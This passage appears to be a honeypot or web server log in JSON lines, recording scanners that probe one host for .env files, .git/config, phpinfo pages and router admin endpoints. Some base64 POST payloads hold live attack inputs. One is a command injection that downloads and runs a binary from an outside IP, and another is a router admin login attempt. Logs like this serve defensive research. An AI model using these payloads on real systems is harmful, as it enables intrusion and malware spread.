"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/docker/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/docker/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/apps/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/apps/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/live_env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/live_env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/fedex/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/fedex/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/system/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/system/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/development/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/development/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/private/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/private/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.env.save", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Content_Length": "20", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "POST", "Path": "/.env.save", "Http_Version": "HTTP/1.1", "POST_Payload": "MHglNUIlNUQ9YW5kcm94Z2gwc3Q="} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/frontend_dev.php/$", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/debug/default/view?panel=config", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/.json", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/config.json", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/phpinfo.php", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/?phpinfo=1", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/_profiler/phpinfo", "Http_Version": "HTTP/1.1"} +{"ip": "154.26.155.155", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0", "Method": "GET", "Path": "/info.php", "Http_Version": "HTTP/1.1"} +{"ip": "128.201.218.75", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "79.110.62.146", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Linux Gnu (cow)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "84.54.51.190", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "103.187.190.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "103.187.190.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "103.187.190.30", "Connection": "close", "Content_Length": "441", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)", "Method": "POST", "Path": "/sdk", "Http_Version": "HTTP/1.1", "POST_Payload": "PHNvYXA6RW52ZWxvcGUgeG1sbnM6eHNkPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYSIgeG1sbnM6eHNpPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxL1hNTFNjaGVtYS1pbnN0YW5jZSIgeG1sbnM6c29hcD0iaHR0cDovL3NjaGVtYXMueG1sc29hcC5vcmcvc29hcC9lbnZlbG9wZS8iPjxzb2FwOkhlYWRlcj48b3BlcmF0aW9uSUQ+MDAwMDAwMDEtMDAwMDAwMDE8L29wZXJhdGlvbklEPjwvc29hcDpIZWFkZXI+PHNvYXA6Qm9keT48UmV0cmlldmVTZXJ2aWNlQ29udGVudCB4bWxucz0idXJuOmludGVybmFsdmltMjUiPjxfdGhpcyB4c2k6dHlwZT0iTWFuYWdlZE9iamVjdFJlZmVyZW5jZSIgdHlwZT0iU2VydmljZUluc3RhbmNlIj5TZXJ2aWNlSW5zdGFuY2U8L190aGlzPjwvUmV0cmlldmVTZXJ2aWNlQ29udGVudD48L3NvYXA6Qm9keT48L3NvYXA6RW52ZWxvcGU+"} +{"ip": "103.187.190.30", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)", "Method": "GET", "Path": "/nmaplowercheck1698226557", "Http_Version": "HTTP/1.1"} +{"ip": "103.187.190.30", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)", "Method": "GET", "Path": "/evox/about", "Http_Version": "HTTP/1.1"} +{"ip": "103.187.190.30", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)", "Method": "GET", "Path": "/HNAP1", "Http_Version": "HTTP/1.1"} +{"ip": "103.187.190.30", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.0"} +{"ip": "103.187.190.30", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "170.64.192.55", "Accept": "*/*", "Connection": "close", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.93.93.20", "Accept": "*/*", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "66.240.236.116", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "3.84.188.63", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4853.129 Safari/537.36", "Method": "GET", "Path": "/wp-config.php-backup", "Http_Version": "HTTP/1.1"} +{"ip": "192.241.198.23", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/manager/text/list", "Http_Version": "HTTP/1.1"} +{"ip": "31.220.3.140", "Host": "116.202.22.148:8080", "User_Agent": "Hello World", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "67.217.57.54", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "close", "Host": "116.202.22.148:80", "Upgrade_Insecure_Requests": "1", "User_Agent": "Linux Gnu (cow)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "109.237.98.226", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "109.237.98.226", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "159.223.98.198", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 zgrab/0.x", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "31.220.3.140", "Host": "116.202.22.148:8080", "User_Agent": "Hello World", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.187", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.183", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "18.119.179.222", "Accept_Charset": "utf-8", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Linux; Android 8.0.0; HWI-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "72.69.14.22", "Cookie": "user=admin", "Method": "POST", "Path": "/goform/set_LimitClient_cfg", "Http_Version": "HTTP/1.1", "POST_Payload": "dGltZTE9MDA6MDAtMDA6MDAmdGltZTI9MDA6MDAtMDA6MDAmbWFjPTt3Z2V0IGh0dHA6Ly8xMDMuNjcuMTk3LjIzMy9tcHNsOyBjaG1vZCA3NzcgbXBzbDsgLi9tcHNsIGxibGluay5zZWxmcmVwOw0KDQo="} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "165.22.197.101", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-US,en;q=0.9", "Cache_Control": "no-cache", "Host": "cdn.irserv.sbs", "Pragma": "no-cache", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "159.65.120.34", "Accept": "*/*", "Accept_Charset": "UTF-8", "Accept_Encoding": "UTF-8", "Accept_Language": "*", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "165.154.164.79", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148:8080", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "165.154.164.79", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "165.154.164.79", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "165.154.164.79", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "165.154.164.79", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148:8080", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "93.117.9.45", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.41", "Accept_Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Host": "116.202.22.148", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.41", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.41", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/robots.txt", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.41", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11", "Method": "GET", "Path": "/sitemap.xml", "Http_Version": "HTTP/1.1"} +{"ip": "118.193.59.41", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Authorization": "NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.27.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "185.36.81.33", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.52", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "138.128.242.188", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36", "Method": "GET", "Path": "/.git/config", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.183", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "141.98.11.60", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en US,en;q=0.9,sv;q=0.8", "Connection": "keep-alive", "Content_Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46", "X_Requested_With": "XMLHttpRequest", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "104.199.31.214", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Connection": "keep-alive", "Host": "116.202.22.148", "User_Agent": "python-requests/2.31.0", "x-datadog-trace-id": "8792375150250542417", "x-datadog-parent-id": "9794435534777718685", "x-datadog-sampling-priority": "0", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.140", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.52", "Host": "116.202.22.148:80", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.52", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "167.248.133.52", "Accept_Encoding": "gzip", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)", "Method": "GET", "Path": "/favicon.ico", "Http_Version": "HTTP/1.1"} +{"ip": "45.128.232.125", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "193.35.18.33", "Host": "google.com:443", "User_Agent": "Go-http-client/1.1", "Method": "CONNECT", "Path": "google.com:443", "Http_Version": "HTTP/1.1"} +{"ip": "83.49.102.197", "Content_Length": "0", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "106.119.167.146", "Accept": "*/*", "Accept_Encoding": "gzip", "Accept_Language": "zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.224.128.184", "Host": "xvideos.com", "Method": "GET", "Path": "/?q=ultrasurf", "Http_Version": "HTTP/1.1"} +{"ip": "79.110.48.125", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Length": "29", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "Origin": "http://116.202.22.148:80", "Referer": "http://116.202.22.148:80/admin/login.asp", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", "Method": "POST", "Path": "/boaform/admin/formLogin", "Http_Version": "HTTP/1.1", "POST_Payload": "dXNlcm5hbWU9YWRtaW4mcHNkPUZlZWZpZm9mdW0NCg0K"} +{"ip": "195.116.52.177", "Host": "116.202.22.148", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "118.126.124.10", "Accept": "*/*", "Accept_Encoding": "gzip, deflate", "Host": "116.202.22.148", "User_Agent": "Python/3.6 aiohttp/3.8.3", "X-Test-Token": "f1b600cef73c4757dc04c2f9349609b5", "Method": "HEAD", "Path": "/.env", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.137", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/", "Http_Version": "HTTP/1.1"} +{"ip": "185.180.143.137", "Accept": "*/*", "Accept_Encoding": "gzip", "Host": "116.202.22.148:8080", "User_Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "Method": "GET", "Path": "/showLogin.cc", "Http_Version": "HTTP/1.1"} +{"ip": "193.42.33.148", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept_Encoding": "gzip, deflate", "Accept_Language": "en-GB,en;q=0.5", "Connection": "keep-alive", "Content_Length": "29", "Content_Type": "application/x-www-form-urlencoded", "Host": "116.202.22.148:80", "Origin": "http://116.202.22.148:80", "Referer": "http://116.202.22.148:80/admin/login.asp", "Upgrade_Insecure_Requests": "1", "User_Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0", 